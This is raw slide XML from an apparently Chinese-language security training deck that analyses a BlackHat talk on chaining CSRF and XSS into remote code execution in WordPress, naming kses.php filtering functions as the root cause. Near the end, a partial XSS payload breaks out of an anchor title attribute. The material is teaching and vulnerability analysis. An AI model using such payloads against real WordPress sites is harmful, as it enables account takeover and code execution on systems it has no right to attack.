              <a:ln w="15875" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="1D4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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Freeform 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A8816E4-9687-894B-AAAC-D90489665B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250" y="2364526"/>
                <a:ext cx="660243" cy="664102"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 171 w 171"/>
                  <a:gd name="T1" fmla="*/ 62 h 172"/>
                  <a:gd name="T2" fmla="*/ 171 w 171"/>
                  <a:gd name="T3" fmla="*/ 172 h 172"/>
                  <a:gd name="T4" fmla="*/ 0 w 171"/>
                  <a:gd name="T5" fmla="*/ 172 h 172"/>
                  <a:gd name="T6" fmla="*/ 0 w 171"/>
                  <a:gd name="T7" fmla="*/ 0 h 172"/>
                  <a:gd name="T8" fmla="*/ 119 w 171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72">
                    <a:moveTo>
                      <a:pt x="171" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="171" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="15875" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="1D4999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 dirty="0">
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grp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81567BEF-5A71-4B4B-BE1F-6214607A0641}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-255181" y="3636286"/>
            <a:ext cx="1271653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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2BD3236-9936-1948-9F0F-C29DA5D74DF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1385208" y="2156346"/>
            <a:ext cx="860063" cy="122981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x-none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7" name="文本占位符 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BCB56C4-37BA-674B-99C0-B1E61C214A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9075" y="3906000"/>
            <a:ext cx="4699000" cy="622300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accent1">
                    <a:lumMod val="7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b="0" i="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01</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" b="0" i="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课程主题 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" b="0" i="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&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" b="0" i="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章节标题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569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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14054E9E-0F76-D748-84B2-3556AD3E074B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="125476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内容占位符 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4087A304-E857-444A-ABFC-B1C6F282DF66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363600" y="306000"/>
            <a:ext cx="5307299" cy="529297"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="3200" b="0" i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lvl="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>开发工具</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="内容占位符 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87C7518F-241E-4445-9C9D-BF588D10A72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2045335" y="1848825"/>
            <a:ext cx="4945203" cy="355624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="7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标题文本</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr kumimoji="1"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AA6C063-3E45-254F-961C-6B4BA8E2190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044700" y="2754000"/>
            <a:ext cx="4945063" cy="1222375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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内容文字编辑详述</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="图片占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3AC0B9-4CEF-5149-915F-CA1A0E9CB6F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88561" y="1510699"/>
            <a:ext cx="1074738" cy="1031875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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9354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展示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7562F9FE-7978-AA41-A91C-C2F99412B475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8052420" y="3058546"/>
            <a:ext cx="901643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b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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5" name="内容占位符 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{991A20D3-D8BE-1140-85E8-20A7BEF2EF5A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2336800" y="2095200"/>
            <a:ext cx="8205788" cy="369332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1800" b="0" i="0"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endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="76" name="Object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8306A44-E6CF-5847-8927-8445BFB83920}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr userDrawn="1">
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2229442427"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="208800" y="180000"/>
          <a:ext cx="1650275" cy="585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9" name="CorelDRAW" r:id="rId3" imgW="3593160" imgH="2886480" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="CorelDRAW" r:id="rId3" imgW="3593160" imgH="2886480" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="7" name="Object 6">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F7699BC-DD9F-CD49-A658-9F9F0E1A837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8800" y="180000"/>
                        <a:ext cx="1650275" cy="585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EED0F0-EA18-A44A-8865-FC4A66BD3A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188800" y="180000"/>
            <a:ext cx="5892800" cy="524933"/>
          </a:xfr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b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr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1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RDBMS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>术语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4306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61507-227F-8047-AFCF-87D4FA6AD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98466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AB9CAA6-3445-2242-B306-07A30B223A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2020/9/23</a:t>
            </a:fld>
            <a:endParaRPr lang="x-none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3F361D-86BB-3F46-870B-907BE2A0F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35323-72B1-9141-AB86-A1BB5B7370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3416017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EDFCA-6A70-804C-A28F-8578C657E5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x-none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1F4FBD2-415D-484D-BD25-391B229CD8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x-none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DEAD4C-0313-D44F-8F30-F6DED0293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72FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/9/23</a:t>
            </a:fld>
            <a:endParaRPr lang="x-none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07F97-57CE-994B-9779-177E8B530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x-none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CDC30-71E1-FF4B-9826-C92E71185B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B1D5A4-0FA2-5942-84AD-8787CEB3F7AA}" type="slidenum">
              <a:rPr lang="x-none" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld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2967856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B86D1C2-547C-3C4A-890F-A1A80B6981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B906CD-6378-4E46-B0A9-0BCADC4EC6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67B805-D82E-6A4E-A92F-AB8ECE2039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F47C48-9FC5-1844-A10E-5AF570C1D230}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2020/9/23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6CEAEA-A825-2640-B9C8-15E1C51955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391378-85AB-6148-86C4-FD5EB657C1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5CAA7F-1B67-9445-91CE-19F71D6D8DF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096682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4" r:id="rId4"/>
    <p:sldLayoutId id="2147483655" r:id="rId5"/>
    <p:sldLayoutId id="214748365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F81D485D-A2E7-4847-9F0D-F9DDC7B43516}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="1093748"/>
            <a:ext cx="3536212" cy="4703754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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78F8924F-8B41-6142-955D-1B0C6F6F4A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1489006" y="2560041"/>
            <a:ext cx="2438767" cy="1737917"/>
            <a:chOff x="1238250" y="2264138"/>
            <a:chExt cx="2540000" cy="1810058"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Title 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C690CBC-8273-D349-8157-7331D1E55C75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3670300"/>
              <a:ext cx="2540000" cy="403896"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
              <a:sp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2800" b="1" kern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l"/>
              <a:endParaRPr lang="en-US" b="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endParaRPr>
            </a:p>
          </p:txBody>
        </p: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BC89281-EF38-C940-9341-B270697335B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3349464"/>
              <a:ext cx="768350" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="762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" name="Group 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A731677F-9513-A24C-ACA0-117DF9B3D8E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1238250" y="2264138"/>
              <a:ext cx="768350" cy="764490"/>
              <a:chOff x="1238250" y="2264138"/>
              <a:chExt cx="768350" cy="764490"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Freeform 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83A41969-86DA-C543-A41D-D1E63FA59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65664" y="2264138"/>
                <a:ext cx="640936" cy="571437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 166 w 166"/>
                  <a:gd name="T1" fmla="*/ 0 h 148"/>
                  <a:gd name="T2" fmla="*/ 48 w 166"/>
                  <a:gd name="T3" fmla="*/ 148 h 148"/>
                  <a:gd name="T4" fmla="*/ 0 w 166"/>
                  <a:gd name="T5" fmla="*/ 100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6" h="148">
                    <a:moveTo>
                      <a:pt x="166" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="48" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Freeform 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68DB313F-F047-E446-9ABB-93D70609E1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38250" y="2364526"/>
                <a:ext cx="660243" cy="664102"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 171 w 171"/>
                  <a:gd name="T1" fmla="*/ 62 h 172"/>
                  <a:gd name="T2" fmla="*/ 171 w 171"/>
                  <a:gd name="T3" fmla="*/ 172 h 172"/>
                  <a:gd name="T4" fmla="*/ 0 w 171"/>
                  <a:gd name="T5" fmla="*/ 172 h 172"/>
                  <a:gd name="T6" fmla="*/ 0 w 171"/>
                  <a:gd name="T7" fmla="*/ 0 h 172"/>
                  <a:gd name="T8" fmla="*/ 119 w 171"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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172">
                    <a:moveTo>
                      <a:pt x="171" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="171" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="15875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 sz="1600"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E08C75F-1B3A-3E4F-8D42-D1BA5E8FBE2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5249808" y="1588272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01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 定义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原理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4B4B1C2-1090-CC43-867A-DA4F1AB5C235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4299685" y="1364005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4D9AD9-41AC-0342-95E1-88D45D9880DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4278345" y="3046127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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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57D4893-1B52-DD40-A6AC-AB457A1F89BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4299685" y="4726722"/>
            <a:ext cx="725533" cy="725533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D499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0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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E592BB7-8F23-574B-961F-6AEAB26B2E56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230353" y="2280064"/>
            <a:ext cx="5971046" cy="143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1029ECB9-83CF-D443-B6E5-F388E0F2F301}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230351" y="3902999"/>
            <a:ext cx="5971046" cy="1432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B6E2DB65-76E4-7E4B-86B9-7AEB8AD53726}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12095544" y="31598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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7D71438-593C-9A48-AEBE-F8F834BA3B96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230350" y="4950988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Xss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RCE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a typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122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A8A3F25F-63CE-4546-A645-94C032AC906B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1489006" y="3910159"/>
            <a:ext cx="2438767" cy="1163395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b="1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b="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BlackHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="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议题追踪：从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="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Xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="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到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="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RCE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B40C62F2-D666-104E-A622-C441EC966065}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230349" y="3218868"/>
            <a:ext cx="5971047" cy="276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从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csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>Xss</a:t>
            </a:r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  <a:ea typeface="Alibaba PuHuiTi Medium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029872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657F97-0982-1140-90B5-65B0D262C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漏洞根源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3E441B-0D0F-794E-B88E-2653A7B30E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22903"/>
            <a:ext cx="12192000" cy="12881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3F712A8-2F60-3A48-B9BE-33C9EFF33B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428999"/>
            <a:ext cx="7302500" cy="29337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E18E9EBD-D3D3-AC44-87E9-919B85820B5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1109472" y="947851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./wp-includes/comment.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1"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DFF7904-5AFB-8F4F-ABBB-13C705A6C61A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1109472" y="286291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./wp-includes/kses.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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191B239-D388-B94A-A67C-7BB0754F4ABB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3950217"/>
            <a:ext cx="9125712" cy="128016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E53869E9-730F-3547-B482-46576FAFF4CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2578608" y="1463027"/>
            <a:ext cx="9473184" cy="60620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22847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657F97-0982-1140-90B5-65B0D262C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漏洞根源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46F86D52-BFE0-C446-B356-FE9146B72020}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2009707" y="1655909"/>
            <a:ext cx="2194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wp_filter_post_kses()</a:t>
            </a:r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74EFCE-4DE1-3E47-A1CE-C2AB28E47E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2009707" y="3192035"/>
            <a:ext cx="16642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/>
              <a:t>wp_filter_kses()</a:t>
            </a:r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8977D58-64EE-9F40-966F-C17FAC9C4F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9707" y="3767090"/>
            <a:ext cx="7721600" cy="7112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D9DEC96-C6AC-4444-B2A5-0424EB75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8283" y="2282356"/>
            <a:ext cx="6883400" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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05C4BDD8-CCDD-4740-BE3D-0DC8B3183BB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1084498" y="10362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/wp-includes/kses.php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1312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3657F97-0982-1140-90B5-65B0D262C4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漏洞根源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C4BDD8-CCDD-4740-BE3D-0DC8B3183BB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1084498" y="1036212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/wp-includes/kses.php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E22CCBC-DCF1-2E46-A7D7-DF701BB270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8" y="1549400"/>
            <a:ext cx="7442200" cy="37592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BF8EA55-5B76-704F-A77E-E01A739422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576" y="3116688"/>
            <a:ext cx="4838700" cy="2705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47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88C2E78-83D7-1E48-9FC4-71827DF110F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漏洞根源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EAC72B-8CFD-734C-8324-A186D4D6D65E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="989406" y="892964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/>
              <a:t>/wp-includes/formatting.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/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F03361CE-9032-BE44-BF1C-52C5167D0B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3011760" y="1405544"/>
            <a:ext cx="7861300" cy="2832100"/>
            <a:chOff x="2188800" y="1616186"/>
            <a:chExt cx="7861300" cy="28321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08584D2-1306-A540-A480-3582379CB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88800" y="1616186"/>
              <a:ext cx="7861300" cy="2832100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DD092C80-783C-7B49-8428-1056F65FC7FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3596296" y="3032236"/>
              <a:ext cx="4419010" cy="108813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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFA1274F-7711-464A-AFC9-F50910C42460}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1756628" y="4788867"/>
            <a:ext cx="9807588" cy="3556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2000" dirty="0"/>
              <a:t>&lt;a title=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'Xss " </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
